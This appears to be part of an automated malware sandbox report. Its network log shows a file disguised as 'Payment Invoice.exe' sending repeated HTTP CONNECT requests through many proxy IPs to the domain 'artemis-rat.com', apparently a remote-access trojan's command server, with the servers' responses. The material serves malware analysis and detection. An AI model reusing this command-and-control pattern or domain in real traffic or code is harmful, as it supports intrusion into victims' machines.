                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1239192.168.2.453836104.22.37.236807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.017493010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.173819065 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1240192.168.2.45365647.74.152.2988887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.025381088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.823935986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.027299881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1241192.168.2.45364560.190.68.15473027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.026176929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.378294945 CET90INHTTP/1.1 200 OK
                                                                Content-Type: application/json
                                                                Connection: close
                                                                Content-Length: 55


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1242192.168.2.453854104.23.125.117807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.030273914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.190591097 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1243192.168.2.45369641.254.53.7019817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.031323910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.823894978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.824592113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.824378014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1244192.168.2.45183031.24.44.92506877076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.036351919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.120465040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.216629028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.323776960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.323621988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1245192.168.2.45370179.110.201.23580817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.036847115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1246192.168.2.45170831.24.44.92501097076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.038743973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.089541912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.183371067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1247192.168.2.45376491.142.222.84122667076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.045664072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.792448997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.757263899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.589616060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.183670044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.691622972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.202936888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.386884928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1248192.168.2.4537303.37.125.7631287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.046072960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.363909960 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1249192.168.2.453683114.132.202.7880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.047317982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.612143040 CET84INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Transfer-Encoding: chunked


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1250192.168.2.451876162.240.208.98437047076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.049460888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.089557886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.183397055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.205559969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1251192.168.2.45201438.7.109.25380807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.050137997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.670916080 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1252192.168.2.453655103.83.232.122807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.057251930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.439044952 CET343INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 182
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1253192.168.2.451756148.66.130.53542097076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.060507059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.120595932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.216625929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.323810101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.323592901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:56.323606014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:08.323616982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:32.323606968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:20.323898077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1254192.168.2.453880104.23.141.196807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.063123941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.217492104 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1255192.168.2.453885104.16.230.163807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.064080000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.218954086 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1256192.168.2.452977154.239.9.8280807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.065427065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.120764017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.216646910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.323802948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.323692083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:56.327810049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:08.325365067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:32.325324059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:20.323909044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
